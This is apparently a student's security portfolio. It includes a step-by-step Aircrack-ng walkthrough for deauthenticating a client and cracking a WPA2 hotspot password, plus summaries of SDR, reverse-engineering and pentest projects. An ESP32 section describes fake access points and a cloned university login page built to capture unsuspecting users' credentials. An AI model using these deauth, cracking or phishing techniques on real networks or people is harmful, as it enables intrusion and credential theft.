Why ?

This project is a direct continuation of my Wifijammer experiments. I have a strong interest in wireless communications and protocols like Wi-Fi and BLE, which drives me to test these vulnerabilities firsthand.

Moving forward, I plan to explore more advanced attacks and further deepen my understanding of these protocols to better comprehend how modern wireless security layers interact.

Aircrack-ng is a network software suite consisting of a detector, packet sniffer, WEP and WPA/WPA2-PSK cracker and analysis tool for 802.11 wireless LANs. It works with any wireless network interface controller whose driver supports raw monitoring mode and can sniff 802.11a, 802.11b and 802.11g traffic.

Installation link

Setup

I am using the TP-LINK TL-WN722N. My internal card supported monitor/promiscuous mode but lacked packet injection. Since I am not using the V1 hardware, I faced some driver issues on Fedora (poor maintenance), so I switched to a standard Kali VM using a specific GitHub repo for the drivers.

Objective

Monitor my own smartphone hotspot (AP), connect another device, and attempt to crack the password by capturing the 4-way handshake.

SCHEMA handshake

Step 1 : Enable Monitor Mode

First, we stop the network processes that might interfere and switch the interface to monitor mode to “listen” to all surrounding traffic.

# Enable monitor mode
airmon-ng start <interface>

# In my case
airmon-ng start wlan0

When I start airmon, I see that the monitor mode is up on my externe card. I see that two processes can cause troubles too. I can use airmon-ng check kill to kill the unwanted processes if i have troubles.

The interface is now successfully in Mode:Monitor.

Step 2: Testing Injection

Before starting the attack, we must ensure the card can actually inject packets into the stream (for Deauthentification).

aireplay-ng --test wlan0 

Injection is working perfectly; we can proceed with the capture.

Monitoring - Capturing Packets

We start by scanning all nearby networks to identify the target BSSID and Channel.

Commands

# global case
sudo airodump <interface_internet>

# in my case
sudo airodump wlan0

Once the target is identified, we focus the capture on its specific channel and BSSID to save the handshake into a file.

airodump-ng wlan0 -c 6 --bssid 1E:50:39:40:32:A9 -w capture

Field Explanations : Access points

 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID
 1E:50:39:40:32:A9  -38        5        0    0  12  130   WPA2 CCMP   PSK  iPhone de ******

• BSSID: Physical MAC address of the AP.
• PWR: Signal strength. Closer to 0 is better.
• Beacons: Announcement packets sent by the AP.
• #Data: Number of captured data packets.
• CH: Operating channel (1-13 for 2.4 GHz).
• MB: Maximum supported.
• ENC / CIPHER: Security .
• AUTH: Authentication mode (PSK = Pre-Shared Key/Password).

Attacking - Deauthentification

To capture a handshake, a device must connect to the AP. If a device is already connected, we send deauth packets to force it to disconnect. When it automatically reconnects, we capture the handshake.

Commands

# Send packets deauth, 0 means continuous
aireplay-ng --deauth 0 -a 1E:50:39:40:32:A9 wlan0

So I’m sending a lot of packet until the device is disconnected to the AP. After this, it’s will try to reconnect and I will capture the handshake.

Now we see that we have the handshake, we can stop the deauth. We don’t need to monitor traffic anymore.

Field Explanations : Clients

 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probe
 1E:50:39:40:32:A9  02:A8:AA:62:0E:A9  -18  1e -1       0      1102         iPhone de ******        

• STATION: MAC address of the connected device.
• Lost: Number of dropped packets. High loss means an unstable connection.
• Probes: Network names the device is searching for.

Cracking - Breaking WEP And WPA/WPA2-PSK Encryption

Now that we have the .cap file containing the handshake, we use a wordlist to compare the captured hashes with generated ones until we find a match. Here I used a small wordlist ~4000 words.

Commands

aircrack-ng -w dict.txt -b 1E:50:39:40:32:A9 capture-01.cap

Password found: ok1234567.

Conclusion, for now…

The Aircrack-ng suite remains a powerful tool for auditing wireless network security. By capturing the 4-way handshake, we can move the attack “offline.” This means the target network is no longer needed once the capture is successful.

In this project, using the TP-LINK TL-WN722N required specific driver handling, but it proved that even modern devices like an iPhone hotspot are vulnerable if the passphrase (PSK) is too simple. To defend against these attacks, always use complex passwords that are not found in common dictionaries.

Later I will try to see the communication in clear text thanks to the password I found, and to do some beaconing, using airebase and airedecap.

Preamble & Debug

I had a lot of troubles with many things, like my wireless drivers, my OS, so I just used a Kali Vm.

# Ensure commands are run as root

# Check if the driver module is loaded
lsmod | grep 8188eu

# If not, load it manually
modprobe 8188eu

# If dump works but injection fails, kill interfering processes
airmon-ng check kill
    
# Manual monitor mode toggle, if airmon-ng start fails
ip link set <interface> down
iw <interface> set monitor control
ip link set <interface> up

# Verify status
iwconfig

# Restart network services once finished
service NetworkManager restart

This report explores the vulnerabilities of IoT devices through SDR techniques. Conducted at Sorbonne University, the project addresses the inherent risks of radio communications, where signals propagate in open space, making them susceptible to interception and jamming.

The study utilizes a Raspberry Pi platform equipped with RTL-SDR and PlutoSDR hardware to analyze devices operating on various frequencies. Key experiments include:

• Replay Attacks: Intercepting and re-emitting fixed codes to control smart plugs and roller shutters using tools like 433Utils and URH.
• False Data Injection Attacks: Manipulating weather station displays by injecting forged temperature frames.
• Advanced Signal Analysis: Moving to the 2.442 GHz band to reverse-engineer drone communications using GNU Radio, which involved bypassing XOR encryption and calculating CRC to retrieve a hidden flag.

The project demonstrates that many consumer IoT devices remain fragile due to the use of simple modulations (ASK/OOK) and the absence of protective mechanisms such as rolling codes or robust encryption.

Project Description

This project focused on hardware reverse engineering and the study of embedded systems. We dissected an STM32F4-based device to understand its internal logic and communication:

• Firmware Extraction: Interfaced with the STM32F4 microcontroller via debug ports to successfully dump the internal memory and retrieve the binary payload.

• Protocol Analysis: Identified and decoded TLV (Type-Length-Value) command structures used by the firmware to exchange data with external peripherals.

• Binary Analysis: Used Ghidra and Binary Ninja to decompile the ARM-based firmware, analyzing its command logic, execution flow, and hardware-specific routines.

Wireless Security Research : 802.11

I wanted to learn the basics of WiFi network attacks, so I started experimenting with deauthentication and beaconing. Beaconing is interesting because it relies on user interaction. I enjoy creating personalized clones that mimic real-world services; for example, it was fun rebuilding a fake Moodle login page for a French university. After using Aircrack-ng for deauthentication, I decided to focus less on the attack itself and more on improving the realism of my phishing pages. My next steps are to link these fake Access Points (APs) to the pages and implement a small DNS service to redirect all connections to the correct authentication portal.

I use an ESP32

Phase 1

I tried to manipulate control frames using MicroPython, but it’s restricted and didn’t work. To handle management frames (802.11), I had to go low-level with C. I took a constructive approach using the documentation, starting by displaying one network, then several.

At first, I used Thonny which allowed me to flash and see the code live, very easy. But with MicroPython, I didn’t have the necessary low-level access.

I finally switched to flashing with the esp-idf tool.

send_fake_beacon("Free_WiFi");
send_fake_beacon("Airport_WiFi");
send_fake_beacon("Hotel_Guest");

It worked, I could send Wi-Fi signals with different names. However, with the same MAC address, they all showed up. Then I wanted to display the same Wi-Fi multiple times, but devices merge them into one when parameters and SSID are identical. So I pivoted to spreading a massive amount of fake Access Points.

Phase 2

Simulating my university network:

const char* list[] = {"Eduroam", "eDuroam", "edUroam", "EDUROAM", "eduroaM"};

I just have to call send_fake_beacon for each element in the list.

Phase 3: Captive Portal

I decided to implement a fake HTML login page that I can adapt for various entities like SNCF, McDonald’s, or universities. The goal is to nudge people into authenticating via email or phone number by entering a password. I lead them to think they are logging in for Wi-Fi access while I capture the credentials.

I found out this basic setup is called a captive portal. My goal is that by sending multiple fake APs, users get suspicious and eventually click on the “real fake” one. As you can see, this is a basic implementation of a login system for Sorbonne University.

As mentioned before, I will add more login pages. Before that, I need to configure a DNS that redirects all requests to http://192.168.4.1.

Project Description

This project focused on software reverse engineering and the study of complex infection chains. I dissected malicious components to understand their internal mechanics:

• Binary Analysis: Used Ghidra and Binary Ninja to reverse-engineer a C2 component, analyzing its communication mechanisms and persistence capabilities.
• Malicious Document Analysis: Investigated compromised XLS and PDF files, including macro flow analysis to identify execution vectors.
• Infection Chains: Reconstructed the complete attack lifecycle, from document delivery to the execution of the final payload.

Added Value & Professional Objectives

This experience allowed me to develop a rigorous approach to static analysis and a deep understanding of malicious software architectures:

• Key Skills: Binary analysis, C2 protocol comprehension, malicious document investigation, and technical documentation.
• Professional Applications: Skills directly transferable to Incident Response (DFIR), advanced SOC operations, Cyber Threat Intelligence (CTI), or cybersecurity research.

Project Description

This project moved beyond theory to gain hands-on experience with physical hardware. The objective was to build a complete enterprise network from scratch, focusing on security through strict network segmentation. By creating logical separation between administrative, user, and server domains, I ensured granular control over all traffic flows.

Key components deployed within this segmented architecture include:

• Security & Observability: Implemented a full SIEM stack using Elastic (ELK), Fleet, Elastic Defend, and Auditd for centralized logging and alerting.
• Identity & Collaboration: Deployed LDAP/LAM for centralized identity management and Nextcloud for secure collaboration.
• Perimeter Security: Configured an OPNsense firewall for network control and a WireGuard VPN for secure remote access.
• Automation: Used Ansible for streamlined deployment and configuration management.

Added Value & Professional Objectives

Working with real hardware required addressing complex operational issues, such as service interoperability and network misconfigurations, providing a full lifecycle experience:

• Technical Versatility: Validated expertise across Linux, virtualization, routing, and directory services.
• System Hardening: Demonstrated the ability to design secure-by-default architectures using modern segmentation and monitoring tools.
• Operational Readiness: Confirmed the capability to design, secure, and maintain a modern enterprise information system (IS) from the ground up.

Project Description

This project, conducted at Sorbonne University, consisted of a comprehensive penetration testing exercise on Windows and Linux environments, including web application audits. I applied a rigorous end-to-end methodology:

• Reconnaissance & Scanning: Used Nmap for network mapping and service discovery.
• Web Analysis: Performed fuzzing and application penetration testing using Burp Suite.
• Exploitation: Executed brute-force attacks via Hydra, researched CVEs on ExploitDB, and performed exploitation with Metasploit.
• Reporting: Authored a detailed audit report covering vulnerabilities, impact analysis, and remediation recommendations.

Added Value & Professional Objectives

This experience allowed me to consolidate a strong foundation for my cybersecurity career:

• Methodological Reflexes: Developed a structured approach to exploitation and remediation.
• Technical Proficiency: Gained mastery over hybrid environments (Systems & Web).
• Audit Expertise: Developed the ability to transform technical analysis into professional reports directly transferable to corporate environments (security audits, advanced Pentesting).